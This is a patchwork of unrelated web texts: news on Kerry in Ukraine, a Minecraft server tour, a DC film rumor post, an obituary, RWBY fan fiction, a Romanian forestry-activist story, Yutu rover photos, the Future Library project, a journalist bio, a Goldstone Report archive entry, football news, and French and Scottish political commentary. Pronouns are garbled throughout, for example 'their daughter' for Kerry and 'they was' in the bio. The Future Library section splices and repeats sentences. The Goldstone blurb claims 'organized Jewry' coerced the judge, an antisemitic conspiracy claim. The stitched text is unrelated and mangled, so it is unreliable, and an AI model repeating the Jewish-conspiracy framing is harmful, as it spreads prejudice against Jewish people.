As Kerry arrived in the capital, the White House announced a $1 billion loan guarantee for the new government, aimed at helping it cement a separate financing deal with the International Monetary Fund. Specifically, the guarantee is intended to "insulate" the Ukrainian economy from the price shocks that are expected to occur when the government is forced, as a term of the IMF deal, to increase the cost of the energy supplies that Russia once subsidized.
The White House also announced that the U.S. will provide technical assistance to Ukraine, on matters ranging from the recovery of stolen assets and the diversification of the country's energy portfolio to how to hold nationwide elections on May 25.
Before setting out for Eastern Europe, Kerry had made a quick stop in Manhattan, where their daughter Alexandra resides, to welcome the birth of their second grandchild.
The Social Experiment
Described by it's creator codhope1234 , as “a server with no rules.”, The server SocialExperimentMC aims to conduct—as the name suggests—an experiment.
codhope1234 goes further, stating that “I want to do an experiment with Minecraft and its community. I'm running a server with NO rules and At the end of 30 days from 12/9/14 (Australia), I'm going to check up on the server and see what has happened. When I say no rules I MEAN NO RULES, do what ever you want. Make rules up, lie to people, steal, do what ever I DO NOT CARE.”
Server Details
Minecraft IP – mc.socialexperimentmc.com
Teamspeak IP – ts.socialexperimentmc.com
You can also follow the servers events at the subreddit http://www.reddit.com/r/SocialExperimentMC
Our Tour
To see the Social Experiment I hopped on the server. Maybe it's because of timezones, but the server was empty. It wasn't untouched however. Below are a selection of screenshots from my journey.
Spawn
There is no ‘spawn', as such. Instead, just a creeper hole in the ground.
Homeless Shelter
Instead of being greeted by a spawn stripped of everything, I instead found a homeless shelter
Skywalk and someone's tower
One of the main features of spawn was a giant skywalk, extending far beyond the render distance.
This was the only way up
It's quite a long fall down.
it continues further…
Is that something in the distance?
if I hadn't been careful, I would have fallen into the ocean
The View
Mostly shrouded in clouds, this was the view from the top. It's very impressive
The Verdict
Although not really a server review, I felt I should add a closing comment.
The idea seems interesting, and the server has only been up for a few days now. At Gearcraft, we'll follow the server with interest, and urge you to check it out as well.
Over to You
Have you checked out the Social Experiment yet? What are your thoughts? Let us know in the comments below!
Hey Gearcrafters! Now It's your chance to share with us, just hashtag #YoGearcraft on your Twitter post with a link or image to your art, creations, videos, servers or whatever and it will appear right on our #YoGearcraft page for millions to see! It's that easy! So what are you waiting for!? Give us a shout out #YoGearcraft!
Update 05/06/15: Sounds like there was some truth to this report. Warner Bros. just brought in Ben Affleck to oversee Justice League!
Advertisement
Yesterday we learned that Warner Bros. and The Flash director Seth Grahame-Smith parted ways over creative differences, but according to a new report from Birth.Movies.Death there are lots more problems in the DC Extended Universe.
Sources at WB tell me that this is just one part of what's going on behind the scenes at the DC movieverse. Zack Snyder and Geoff Johns were taken aback at critical and audience reaction to Batman v Superman, I'm told, and WB execs have found themselves at odds with Snyder over their vision for Justice League and the DC movieverse going forward. Of course Justice League was scheduled to start shooting mere days after BvS was released, which meant WB couldn't take any definitive action – like removing Snyder or delaying the movie to make changes – without poisoning the box office for BvS. The result? Lots of fights between Snyder and the WB execs, and lots of pressure from Burbank on Snyder, who is shooting in London.
That's not good! And there could be another director shake-up in the DCEU. Citing multiple sources, Birth.Movies.Death says that director James Wan is feeling pretty nervous about their Aquaman movie. Update: James Wan responds to the rumor?
Now I know what you're thinking. Birth.Movies.Death? Didn't they report that Suicide Squad was undergoing reshoots to add more humor? Yes, and they didn't get that one 100% right. But they were the first site to report that Suicide Squad was spending millions on reshoots, which David Ayer later confirmed was being put towards more action.
This is just a rumor, but after the negative response to Batman v Superman: Dawn of Justice and missed box office opportunities, it's not hard to see that there could be some tension between Warner Bros. executives and Zack Snyder — a man who they just gave another $250+ million to for Justice League. Let's not forget… R-rated Deadpool movie made more in the US/Canada than a PG-13 Batman and Superman movie! That is insane.
I'd never waste your time with BS rumors from unreliable sources, and I don't think I'm doing that here.
SOURCE: Birth.Movies.Death
UC Berkeley civil and environmental engineering professor emeritus James Hunt died last month after a brief illness at the age of 66. Colleagues remember them for their selflessness and dedication to their field.
Hunt joined the UC Berkeley faculty in 1980, and their studies dealt primarily with organic contaminant transfer in groundwater, estuaries and surface and subsurface soils, according to a statement released by the campus CEE department. They were best known for their development of a system for injecting steam as a way to remove pollutants from aquifers.
“Berkeley has a very special place in their heart,” said their daughter, Dana Hunt, in a statement to the campus.
As part of Hunt's efforts on campus, they helped merge two programs — fluid mechanics and hydrology and environmental quality, according to CEE department chair Robert Harley. Hunt was interested in contaminants such as trace metals, radionuclides and pathogenic organisms.
“(Hunt) was very involved in leading the Berkeley Water Center and thinking about the quality and quantity of water, used both for agriculture and in cities,” Harley said.
In addition to their teaching and research, Hunt held several active campus leadership roles. Hunt served as a member of the Budget Committee and Divisional Council, was the associate vice provost for Academic Planning and Facilities and directed both the Berkeley Water Center and the Institute for Environmental Science and Engineering, according to the statement. Even after retirement, Hunt continued working as a program evaluator for the Engineering Accreditation Board, where they toured campuses and visited faculty from other programs.
CEE professor William Nazaroff, long-time colleague of Hunt, recalled their remarkable generosity. Nazaroff said in an email that Hunt was a no-nonsense teacher who was clear about their job and priorities.
Upon Hunt's retirement in 2013, they gave a seminar to a standing room-only crowd. Their graduate students wore customized shirts with either a black and white photo of Hunt or one of their famous sayings, including “Keep it simple,” “You already know the answer” and “Story time.”
Harley emphasized that Hunt always put others first, making sure their colleagues and students had the assignments best suited to them before picking up the rest of the work.
“Jim was my faculty mentor and role model,” said David Sedlak, the Berkeley Water Center's co-director in an email. “He taught me the importance of being a critical thinker, especially when it seems like the accepted approach to solving a problem doesn't seem to be working. Leading by example, they also showed us the importance of selflessness and putting the interest of students first. We miss him.”
Harley said the CEE department intends to have a memorial service for Hunt in April for faculty and former students.
Contact Ani Vahradyan at [email protected] and follow them on Twitter at @anivahrad.
Michelle Obama Michelle LeVaughn Robinson ObamaFive political moments to watch for at the Oscars Former patients accuse ex-Fox News medical pundit of sexual exploitation Obama attends UNC-Duke basketball game MORE's brother is reportedly signing on for a job with the New York Knicks.
Craig Robinson, a former college basketball star, has accepted a front office job with the Empire State team, according to a Monday Yahoo Sports report.
Sources told the site that Robinson will serve as general manager of the Knicks's development league team, among other duties.
ADVERTISEMENT
The former first lady's 55-year-old older brother is currently the vice president of player and organizational development for the Milwaukee Bucks.
Former President Obama is a noted basketball fan.
“He does have game,” Robinson, then-men's basketball coach at Oregon State University, said of their brother-in-law in 2011.
Beacon Academy. Home to many huntsmen and huntresses, all learning to hone their skills to fight the enemy of all humankind; the creatures of Grimm. Beacon is home to a particular group of both huntsmen and huntresses, teams RWBY and JNPR, as well as their friends in teams CVFY and SSSN. This story starts where many do, at the beginning.
"Oh, Yang! Gross! You've got puke on your shoes!"
The little redhead, who couldn't be older than 16 was yelling at him. No, not him. She's yelling at the tall, blonde one, who seemed pretty pissed that they had upchucked on them shoes.
Jaune ran for a trashcan, and away from these scary looking new students. Their luck was exceptionally poor today, as there was none in the main cabin for them to use. They stood by the exit to the ship, hoping there would be something they could use soon, or they would be throwing up on someone else's shoes. They did not have to wait long as the airship finished docking just a few minutes later. They barreled out the door and found the nearest trashcan, and proceeded to camp out at said trashcan for the next few minutes as their lunch (which their mom had made for him) fell into the trashcan.
When they had finished loosing their very tasty lunch, they propped themselves up against the wall, growing accustomed to the solid ground again. As they did so, they thought of what was in store for him, now that they were at Beacon Academy. They did not have high hopes as they knew they had no formal training, and could barely hold their own sword.
They quickly checked to make sure that Crocea Mors was still in it's sheath, and a quick feel at their hip confirmed it was still attached. If they lost their family's sword, there would be hell to pay, namely their father.
As they started to get up (which their stomach was still not too happy about), they began to look around at the other students, still filing off the airship. There were many different types of people, they saw. There where many different types of weapons, as well. They usually checked for weapons as that meant they were going to get thrashed. Jaune saw lots of different types of weapons. Some students had some traditional looking swords, but most had some weird amalgamation of different weapons. One student they saw had a particularly nasty looking grenade launcher, which they would be sure to stay away from.
As they started making their way to the main hall for orientation, they got the strange feeling that they would have fun here. They had no way of telling where that feeling had come from, but Jaune had always trusted their instincts, despite them sometimes leading them into trouble.
Lucky for Jaune, their gut lead them to someone else's trouble this time. They watched as the snooty girl with the ponytail stalked off after yelling at the impossibly young redhead. From what Jaune gathered, the younger girl had done something to mess up their hair. At least that's what Jaune thought.
They started to walk up to them to introduce themselves when they lay down in the center of the courtyard. Jaune thought they were weird, but who was they to judge. When they finally reached her, they put out their hand to help them up.
"Hey. I'm Jaune." they introduced themselves as they took their hand and got up.
"Ruby" they said, then snorted, which Jaune thought was kinda cute. What they said next was not as cute.
"Aren't you the guy that threw up on the ship?" 'Great.' they thought, 'I already have a bad reputation.' Little did they know, they would be fast friends with this nice, quirky young girl.
Author's note: Hey everyone, thanks for reading through this first chapter. This is my first RWBY fanfiction, and I haven't written for a couple years, so it may be a little rough at first, but I hope to get better and make this story a hit.
So quick note: I'll be making this as I can, so no real regular updates, but I hope to be working on it as much as I can. The story will have everything the main series has, minus the Roman/Cinder stuff. Cinder should be in the story somewhere (not too sure yet) but they are not currently plotting to destroy everything. Roman is a somewhat infamous crook, who has their own band of men, and is going about their usual thing, stealing dust, so Ruby did fight them at the dust shop in Vale, and they did get away.
I'll mostly be diverging from the main storyline, but I wanted to set up the world abit, plus having the first couple episodes to draw from helped me actually figure out what to write to start off. I'll also be switching between character viewpoints throughout, but I do have a fondness for Jaune, so he'll get a good deal of attention.
So anyway, rate and review as you see fit, and I will hopefully turn this into a nice, long story that will basically be how RWBY would progress if I was writing it, so expect the best of ships as well as some surprises.
Virgin Pulse's Expansion Plans Move Forward in Providence — 300 Jobs, Millions in Subsidies
In December of 2016, Virgin Pulse announced at a State House press conference that the company would grow its footprint in Providence from about 75 in the jewelry district to upwards of 300. The company is slated to receive $5.7 million in subsidies from RI Commerce. The agency approved the package in late 2016.
According to RINPR, the announcement will be made at the Providence Chamber of Commerce dinner tonight at the RI Convention Center that the plans are finally moving forward.
Virgin Pulse acquired Shape-Up, the Rhode Island-based work wellness company founded by Dr. Rajiv Kumar. The expanded RI footprint will be located in downtown of Fountain Street -- in the building which was housed the Providence Journal exclusively. Now, the office building has been rehabbed for multiple companies. Virgin Pulse is expected to move its Framingham, MA headquarters to Providence.
Last year, GoLocal selected Kumar as one of the “16 Who Made a Difference in 2016.”
The Shape-Up RI founder has come a long way - and fortunately for Rhode Island, has come back to their roots
From launching the successful workplace wellness program in Rhode Island over ten years ago, to growing it into a regional and now global healthcare leader, Kumar recently piqued the interest — and backing - of British entrepreneur Richard Branson's Virgin Pulse, who acquired Shape Up this past February.
Fast forward to December, when Virgin Pulse just announced it will be bringing 300 new jobs to Rhode Island in the next five years. Not bad for a kid who dropped out of med school, got their start by winning state and Brown University business plan competitions, and is now proving to be a substantial economic catalyst for not just Providence, but the State of Rhode Island (all while going back to med school, to boot).
"Prior to its acquisition by Virgin Pulse, ShapeUp benefited immensely from strong partnerships with the Rhode Island state government, local institutions, and community leaders. I'm thrilled that Virgin Pulse saw the potential that exists here and decided not only to stay, but to grow our footprint in this supportive and vibrant community," said Dr. Kumar, who now serves as the Chief Medical Office for Virgin Pulse.
And elected officials are just as thrilled — if not more so.
"When Virgin Pulse bought ShapeUp, the worst kept secret among business leaders was that they were looking to move north to Boston,” said Governor Raimondo. “Instead of losing 65 good-paying jobs to Boston, we're going to create nearly 300.”
Kumar might have been focused on the health of workplace employees, but they impacted the health of Rhode Island's economy just as much, if not more.
Related Slideshow: GoLocal: Benchmark Poll, October 2017
Related Articles
Enjoy this post? Share it with others.
La Fălticeni
Un activist de mediu care a sesizat de două ori într-o zi transporturi de lemn suspecte a ajuns să fie amendat chiar el de poliţiştii rutieri. S-a întâmplat la Fălticeni, Florin Grădinariu şi tatăl său fiind amendaţi de un echipaj de la Poliţia municipiului Fălticeni, primul pentru că a refuzat să prezinte pentru control stingătorul de incendiu şi trusa medicală, iar tatăl pentru că a coborât din maşină. Insistenţele lui Florin Grădinariu cu privire la transporturile de lemn i-au iritat în mod evident pe poliţişti, care au întors foaia şi l-au oprit în trafic pe activistul de mediu.
Tânărul a sunat la 112 după ce a verificat aplicaţia „inspectorul pădurii”
Florin Grădinariu este preşedintele Asociaţiei Biosilva, un ONG de protecţia mediului. Luni, tânărul a mers la Iaşi, cu maşina, alături de tatăl său. Aşa cum obişnuieşte, tânărul, de profesie inginer silvic, verifică pe aplicaţia online inspectorulpădurii.ro, creată tocmai în acest scop, pentru orice persoană, maşinile cu lemn pe care le vede în trafic. Atât la plecarea spre Iaşi, cât şi la întoarcere, de ambele ori la Fălticeni, tânărul a sesizat prin 112 că două maşini care transportă lemn nu apar cu cod online generat pe aplicaţia "inspectorul pădurii".
De fiecare dată, după sesizările la 112, tânărul a fost sunat de ofiţerul de serviciu de la Poliţia Fălticeni, care i-a spus că reclamaţiile nu se confirmă, şoferii având hârtii care atestă că transportă doar deşeuri din lemn.
Tânărul reclamă că transportul de deşeuri era, în realitate, de material lemnos
La a doua sesizare, tânărul s-a deplasat la locul unde era camionul oprit şi a cerut explicaţii agenţilor de poliţie. Mai exact, el spune că transportul nu era unul de deşeuri, ci de material lemnos în toată regula:
„Agentul constatator avea obligaţia, în momentul în care nu poate determina despre ce material lemnos este vorba, să sesizeze Garda Forestieră sau cel mai apropiat ocol silvic, pentru ca personalul silvic să clarifice situaţia Eu le-am spus că sunt inginer silvic şi din punctul meu de vedere acolo nu sunt deşeuri din debitare, însă nu am fost băgat în seamă”.
Întorsătura absolut jenantă din acest caz
De aici încolo, lucrurile au luat o turnură absolut jenantă. Florin Grădinariu s-a urcat la volanul maşinii sale şi s-a îndreptat spre Suceava. După numai câteva zeci de metri, a fost tras pe dreapta de aceiaşi poliţişti, care au plecat după el. După cum se vede şi în imaginile filmate de tânăr şi de tatăl acestuia, poliţiştii au început să-i verifice documentele şi maşina. Cum nu au găsit nimic mai grav, Florin Grădinariu a fost amendat pentru că a refuzat să prezinte la control stingătorul de incendii şi trusa medicală, iar tatăl său pentru că a coborât din maşină (n.r. conform articolului 183 din HG 1391/2006 conducătorul auto sau pasagerii sunt obligaţi să rămână în autovehicul şi să nu deschidă portierele, respectând indicaţiile poliţistului). Cele două amenzi se bazează pe prevederi legale, însă problema din acest caz este, din punctul nostru de vedere, cu totul alta: atitudinea poliţiştilor reprezintă o descurajare pe faţă a oricărei iniţiative de sesizare prin 112 a unei posibile ilegalităţi. Probabil, aceştia au fost deranjaţi de tonul activistului şi al tatălui său, însă poliţele de acest gen nu pot fi tolerate la un om al legii.
„Nu pot explica un asemenea gest decât prin faptul că au fost deranjaţi că cineva sesizează un transport ilegal de lemne”
Florin Grădinariu spune că cele două amenzi vor fi contestate în instanţă, însă îi va reclama pe cei doi poliţişti şi pentru abuz în serviciu. În plus, acesta speră ca autorităţile competente să demareze o anchetă serioasă şi cu privire la transporturile de lemn din zona Fălticeni şi acest paravan al transporturilor de deşeuri din lemn. O altă problemă este legată şi de câte transporturi de lemn se fac în baza unui aviz pentru un singur transport, pe distanţe scurte precum Fălticeni-Boroaia.
„Noi, Asociaţia Biosilva, avem astfel de acţiuni periodice, verificăm legalitatea transportului pe aplicaţia <inspectorul pădurii> şi apoi, dacă avem indicii de transport ilegal, sunăm la 112. Am rămas complet dezamăgit de atitudinea agenţilor de la Fălticeni şi nu pot explica un asemenea gest decât prin faptul că au fost deranjaţi că cineva sesizează prin 112 un transport ilegal de lemne”, ne-a declarat Florin Grădinariu.
Acesta a mai spus că în general sesizările pe care le face la Poliţie nu sunt tratate aşa cum a păţit luni la Fălticeni şi speră ca acest caz să fie unul izolat.
Oficialii Inspectoratului de Poliţie Judeţean Suceava au refuzat să vină cu un punct de vedere referitor la acest caz.
Comisarul Ionuţ Epureanu, purtătorul de cuvânt al poliţiei judeţene, a precizat doar că persoanele nemulţumite pot contesta pe cale legală procesele verbale ale poliţiştilor, precum şi celelalte aspecte pentru care se consideră nedreptăţite.
DATE: Jan 13, 2014 | BY: Joelle Renstrom | Category: Sci-Fi In Real Life
In mid-December, China became the third country to land a craft on the moon . But given the holidays and the general madness of the end of the year, it's easy to forget about that rover and what it might be seeing and doing. The Chinese Academy of Sciences is more than happy to remind us, though, and has released a slew of stunning photos taken by Yutu.
Part of the reason for the lunar silence is because Yutu (Chinese for “jade rabbit”) and the Chang'e-3 lander have been hibernating for the past two weeks, which is the equivalent of one lunar night. The vehicles powered down during this time to conserve energy during the frigid (we're talking -180 Celsius or so — eat your heart out, polar vortex) and sunless lunar night. Both Yutu and Chang'e-3 were automatically awakened via solar power, now that there's sunlight, and they're resuming their pre-programmed operations.
While certain pictures of the moon are iconic, they're also old. It's been about 40 years since we've seen photos taken by a vehicle on the moon, and much has changed since then, including photo quality. Enjoy the photos below that show what the moon looks like from Yutu's perspective.
The Yutu rover will spend three months exploring the Bay of Rainbows, lava plains on the moon's surface. It will also leave a telescope there for some serious star-gazing. The Chinese National Space Administration will share all the information it gleans from this mission. In fact, the new chief of China's space agency has announced a willingness to cooperate and share information and technology with “all the countries in the world,” and wants to figure out a way to work with NASA despite a 2011 law prohibiting the use of NASA funds to work with China. It remains to be seen whether China's historic moon landing and rapidly developing space program will prompt collaboration or competition with the U.S. and other space-faring countries, but for the moment, we can all sit back and enjoy the view.
The Artwork
Scottish artist Katie Paterson has created a one hundred year artwork Future Library "Framtidsbiblioteket" for the city of Oslo in Norway.
One thousand trees have been planted in Nordmarka, a forest just outside Oslo, which will supply paper for a special anthology of books to be printed in one hundred years time. Between now and then, one writer every year will contribute a text, with the writings held in trust, unpublished, until the year 2114. Tending the forest and ensuring its preservation for the one hundred year duration of the artwork finds a conceptual counterpoint in the invitation extended to each writer: to conceive and produce a work in the hopes of finding a receptive reader in an unknown future.
Your browser does not support the video tag.
Forest in Nordmarka ( Norway )
Future Library's contributing author for 2016.
“Future Library is a living, breathing, organic artwork, unfolding over one hundred years. It will live and breathe through the material growth of the trees — I imagine the tree rings as chapters in a book. The unwritten words, year by year, activated, materialized. The visitor's experience of being in the forest, changing over decades, being aware of the slow growth of the trees containing the writers' ideas like an unseen energy.”
The manuscripts will be held in trust in a specially designed room in the The prizewinning author, poet, essayist and literary critic Margaret Atwood was the first writer to contribute to the project. The multi-award winning British novelist David Mitchell followed as 2015's author, and celebrated Icelandic novelist Sjón iscontributing author for 2016.is a living, breathing, organic artwork, unfolding over one hundred years. It will live and breathe through the material growth of the trees — I imagine the tree rings as chapters in a book. The unwritten words, year by year, activated, materialized. The visitor's experience of being in the forest, changing over decades, being aware of the slow growth of the trees containing the writers' ideas like an unseen energy.”The manuscripts will be held in trust in a specially designed room in the New Deichmanske Library opening in 2019 in Bjørvika, Oslo. Intended to be a space of contemplation, this room will be lined with wood from the forest. The authors' names and titles of their works will be on display, but none of the manuscripts will be available for reading – until their publication in one century's time.
“Future Library has nature, the environment at its core — and involves ecology, the interconnectedness of things, those living now and still to come. It questions the present tendency to think in short bursts of time, making decisions only for us living now. The timescale is one hundred years, not vast in cosmic terms. However, in many ways the human timescale of one hundred years is more confronting. It is beyond many of our current lifespans, but close enough to come face to face with it, to comprehend and relativise.” Katie Paterson ( Artist )
Silent Room
Silent Room ( New Deichmanske Bibliotek )
New Deichmanske Bibliotek - Oslo City Library - will open its doors to the public in 2019. The one hundred unread and unpublished texts will be held here in a specially designed room, lined with wood from the forest.
The Future Library room will be situated on the top floor of the library along with the special collection of books and archives. It will face in the direction of the forest, which can be glimpsed on the horizon. It will be a small, intimate room, encouraging only one or two people at a time. The authors' names and titles of their works will be on display, but none of the manuscripts will be available for reading – until their publication in one century's time.
The design is in collaboration with architects Hailed by many as a ‘library of the future', the- Oslo City Library - will open its doors to the public in 2019. The one hundred unread and unpublished texts will be held here in a specially designed room, lined with wood from the forest.Theroom will be situated on the top floor of the library along with the special collection of books and archives. It will face in the direction of the forest, which can be glimpsed on the horizon. It will be a small, intimate room, encouraging only one or two people at a time. The authors' names and titles of their works will be on display, but none of the manuscripts will be available for reading – until their publication in one century's time.The design is in collaboration with architects Lund Hagem and Atelier Oslo
“We are building the Silent Room using the trees we cleared from the forest, still containing their scent. The atmosphere is key in our design, aiming to create a sense of quietude, peacefulness, a contemplative space which can allow the imagination to journey to the forest, the trees, the writing, the deep time, the invisible connections, the mystery.” Katie Paterson ( Artist )
Handover Ceremony
“There is a magical, contemplative feeling in the forest. We encourage people to visit, to take this journey, and over the decades, watch the forest grow and change. Year by year, the writers' words forming invisible chapters in the trees whose narratives will be reconstituted a century later.” Katie Paterson ( Artist )
Marc Ambinder ( (); born c. 1978) is an American journalist and producer.  They are editor-at-large of The Week and a member of the USA Today national board of contributors.  They are currently the journalist-in-residence at the University of Pennsylvania School of Law. Their third book, The Brink: President Reagan and the Nuclear War Scare of 1983, is to be published by Simon & Schuster in July 2018.  They are developing a college course on national security reporting for the University of Southern California.
Education [ edit ]
Ambinder received a A.B. from Harvard University in 2001.
Career [ edit ]
Through 2017, Ambinder was a Leadership Fellow at the University of Southern California's Annenberg School of Communications and Journalism, and they consult for Fortune 100 companies on corporate and strategic communication.
Until December 31, 2011 Ambinder was the White House correspondent at the National Journal. They previously worked at ABC News and was chief political consultant to CBS News from 2008 to 2011. For years, they were the author of a political blog, The Hotline.
Though presidential politics and Washington have been their primary areas of interest, they also write about intelligence and national security, and has broken several stories, including details about the raid on Osama bin Laden. Their first book, "The Command: Inside The President's Secret Army," is an examination of the secretive Joint Special Operations Command.
They have secured access to the protective details of the Secret Service, broken stories about computer failures that jeopardized America's nuclear arsenal, probed Pakistan's fragile intelligence services, and became an authority on national security topics ranging from the NSA and surveillance, to the government's secret commando force, to its secretive continuity of government plans.[1][2]
They have written for The New York Times, The New Yorker, The Washington Post, Vice, and numerous national magazines.[3] They have been a consulting producer and on-air expert for documentaries about special operations forces, the Secret Service and government doomsday plans. They have been a guest on every national television news network in the U.S., on the BBC, on Al Jazeera International and was a regular analyst on politics for CBS News Radio.
Their online journalism has won them several awards and attracted a large Twitter following. They were nominated for an Emmy in 2005 and was part of a team that won a DuPont Silver Baton from Columbia University.[4]
Gawker reported that, in 2009, Ambinder struck a deal with Hillary Clinton spokesperson Philippe Reines to provide positive remarks on Clinton in exchange for receiving an advance copy of a Clinton speech.[5][6][7] Gawker based its report on a fragment of an email chain they obtained through Freedom of Information Act request. Both Ambinder and Reines said that the emails lacked critical context, which showed that Ambinder did not actually make any such deal with Reines. Ambinder later said they regretted how such incidents, even when misinterpreted, contributed to the fraying of trust between political journalists and the public, and decried the proliferation of transactional reporting in Washington.[8]
Personal [ edit ]
In 2010 Ambinder wrote about their experience with bariatric surgery, which reduced their weight from 235 to 150 pounds.[9]  They are married to Michael Park, a corporate strategy consultant.[10]
Collection opensource
Language English
HUMAN RIGHTS IN PALESTINE AND OTHER OCCUPIED ARAB TERRITORIES
The international Zionist community and organized Jewry have tried to bury this report and were successful in coercing Justice Richard Goldstone, former judge of the Constitutional Court of South Africa and former Prosecutor of the International Criminal Tribunals in retracting the report's findings.
***
April 2009, the President of the Human Rights Council established the United Nations Fact Finding Mission on the Gaza Conflict with the mandate to investigate all violations of international human rights law and international humanitarian law that might have been committed at any time in the context of the military operations that were conducted in Gaza during the period from 27 December 2008 and 18 January 2009, whether before, during or after.
Public hearings were held in Gaza on 28 and 29 June and in Geneva on 6 and 7 July 2009. The Mission repeatedly sought to obtain the cooperation of the Government of Israel. After numerous attempts had failed, the Mission sought and obtained the assistance of the Government of Egypt to enable it to enter the Gaza Strip through the Rafah crossing.
The Mission has enjoyed the support and cooperation of the Palestinian Authority and of the Permanent Observer Mission of Palestine to the United Nations. Due to the lack of cooperation from the Israeli Government, the Mission was unable to meet members of the Palestinian Authority in the West Bank. The Mission did, however, meet officials of the Palestinian Authority, including a cabinet minister, in Amman. During its visits to the Gaza Strip, the Mission held meetings with senior members of the Gaza authorities and they extended their full cooperation and support to the Mission.
Identifier TheGoldstoneReport-ReportOfTheUnitedNationsFactFindingMissionOnThe Identifier-ark ark:/13960/t82j7rw2h Ocr ABBYY FineReader 8.0 Ppi 300
Mark Warburton speaks to Bees Player after taking up the role as new Brentford Football Club Manager
Mark Warburton was named this morning as the new Manager of Brentford Football Club.
Mark first arrived at Griffin Park in February 2011 as Interim First Team Coach, working alongside Nicky Forster following the departure of Andy Scott.
They were appointed as Sporting Director in the summer of 2011 and took overall responsibility for the football side of the Club.
Working alongside Uwe Rösler, Mark helped build a First Team squad that finished third in League One last season and then lost the League One Play-Off Final.
They have also overseen the opening of a new Category Two Football Academy and built a support team of medical, analysis, conditioning and kit management staff among the best in the country.
After taking on the role of manager, and taking their first training session, Mark spoke to Bees Player.
Subscribers can see the interview here.
The full announcement of Mark's new role can be seen here.
Thibaut De Jaegher
Et c'est reparti ! Dans la foulée d'Eric Woerth, le débat sur le temps de travail en France est revenu sur le devant de la scène. Le nouveau délégué général des Républicains (ex-UMP) a en effet lancé un énième pavé dans la mare en affirmant (pour faire la promo de son nouveau livre-programme) que l'on ne travaillait pas assez en France. Et le politique de lister les raisons de ce déficit, 35 heures en tête, sans surprise.
Tout le monde y est allé ensuite de sa petite phrase pour abonder ou contrer les doctes affirmations du maire de Chantilly. Mais la manière dont a été formulée la question du travail en France n'est peut-être pas tout à fait adapté à la situation actuelle. Pour au moins deux raisons.
1. Un actif sur 5 n'a pas de travail
Soyons clairs. Oui, la France ne travaille pas assez. Mais non, ce n'est pas seulement une histoire de temps de travail. Si la France ne travaille pas assez c'est surtout parce qu'il n'y a pa assez de Français qui travaillent. Faut-il le rappeler ? 5,5 millions de personnes en âge de travailler sont aujourd'hui inactives. C'est bien cette force productive inexploitée qui grève nos statistiques, bien plus que les 35 heures. Le sujet français n'est donc pas comment travailler plus mais comment remettre plus de monde au travail. Mais tant que nous ne toucherons pas de manière forte au coût du travail, il y a peu de chances que les choses changent sur ce plan.
2. Le digital dévore le (temps de) travail
A l'ère numérique, on ne peut plus se poser la question du temps de travail et du travail de la même manière qu'à l'âge industriel. Et pas seulement parce que l'on serait connecté tout le temps et donc, potentiellement, en permanence au « boulot ». Ce qu'il faut surtout comprendre, c'est que les technologies digitales dévorent le travail. C'est même leur principal atout : c'est parce qu'elles sont moins intensives en emploi que les entreprises les adoptent. Cela génère bien sûr de nouveaux jobs mais très peu au regard des destructions engendrées par ces nouveaux services.
Dans ce contexte, remettre sur la table les 35 heures revient à prendre le sujet « travail » par le petit bout de la lorgnette. Pour avancer sur le sujet, il faudrait dépasser ces petites phrases et polémiques stériles, regarder la réalité en face dans toutes ses composantes, pour proposer une organisation de rupture pour notre marché du travail.
Thibaut De Jaegher
BEYOND the continuing challenge from Scotland, there are three dangers for the Tories in this General Election election and therefore a triple opportunity for the rest of us. The first of these the Tories will probably stage-manage to a minimum. The second would be a medium-sized risk for them and it could scupper their assumption that a big majority is theirs for the taking. The third, however, is the really serious one.
The first risk is that Theresa May will be allowed to meet real people or even real journalists during this campaign. The Prime Minister's uncertainty makes Gordon Brown look like a man of the people and a quick-witted tribune of democratic accountability. Not only have the TV debates been junked with only a low-level protest from the broadcasters, the Tories have also succeeded thus far in keeping the Prime Minister out of view of real people and hard political questioning.
The contrast on the one hand between Theresa May's visit to a hall in Banchory with the Tory faithful crammed in pretending to be attendees at a kiddies' party and on the other Nicola Sturgeon meeting all comers at a mobbed May Day event in Turriff on Monday is a very telling one.
One showed a First Minister confident of their campaigning presence. The other showed a Prime Minister whose handlers have no confidence whatsoever in their campaigning ability. There should be a full-scale journalistic revolt against this degree of closed stage-management. It is an affront to democracy but the Tory high command are confident they can get away with it.
The second risk for the Tories is that the attempt to force a single-issue election of Brexit and leadership is rejected by the electorate. Instead, the people might have the effrontery to exercise their right to talk about other things. There was certainly some evidence of this last weekend as I spent a good deal of time on doorsteps talking about Motability vehicle cuts, the WASPI women and the disgraceful rape clause.
As the election broadens, then the Tory grip on it weakens.
By any stretch of the imagination, the Government's record is deplorable. Even the much vaunted post-Brexit boom (or as it should be called the reverse Osborne effect) is beginning to look suspect. Plunging industrial production and retail sales figures have now been followed by confirmation in the first quarter UK growth estimates. The Tories have gone running to the country while the economic going was still looking good.
On everything else there is no case whatsoever for Tory re-election. “Nobody doubts,” said Dr Peter Bennie, chair of the BMA, in February, “that currently Scotland's NHS is in relatively better shape than south of the Border.”
No-one that is but the tartan trolls of the Unionist press who attempt to cast doubt on that statement of obvious fact every day. But the people who have to live with a collapsing health service in England are not fooled. They know the reality and therefore the greater salience these issues come to have in this election, then so the Tory lead will shrink.
Such is Labour's weakness even this probably won't be enough to stop the Tories winning big in England. Nonetheless it could place some of the wilder estimates of Tory victories beyond their reach.
However, there is something which could derail the Tories entirely and that is if their election raison d'etre is under serious question: if people realise fully that this unwanted election has been sold on one big whopper.
That could happen if there were to be moves to indict a clutch of Tory candidates during the campaign on the expenses fallout of their last campaign. Such an eventuality would totally undercut May's claim to be acting in the national interest and demonstrate instead that this is a poll called to promote Tory self-interest and to protect them from the consequences of their own dodgy dealings.
That would be dramatic but is in the lap of the gods – or more accurately in the lap of the Crown Prosecution Service.
However, there is another way that the Tories could be made to eat humble pie and that is if there are more revelations such as the fallout from last week's dinner with the European leaders. It wouldn't take that much for the Downing Street dinner to become May's political last supper.
The accounts have the ring of truth and the non-denial denials from Downing Street confirm them.
Their importance is fundamental.
The reports suggest that it is not the lady but the EU 27 who are not for turning. They leave the prospect of no Brexit deal very real indeed. They suggest that the May/Davis combination has only the loosest grasp of the realities of having a defined relationship with the single marketplace and why that would necessarily involve an enforcement mechanism through an international court.
They suggest, in brief, that as far as negotiations are concerned, it is all over even before the shouting with all the consequences that will flow for real investment, real jobs and real people.
If this is anywhere close to the mark then it exposes the hollow sham at the heart of this election.
It means that May is seeking a mandate to negotiate the impossible.
The press south of the Border will do their best to minimise these revelations. The Tory press will even try to use the European bogeymen as a reason for voting Tory, even if it inevitably means a Theresa Mayhem.
However, there is at least a chance that the people realise they are being taken for a ride. If they cotton on, then the fallout might really puncture the Tory election balloon.
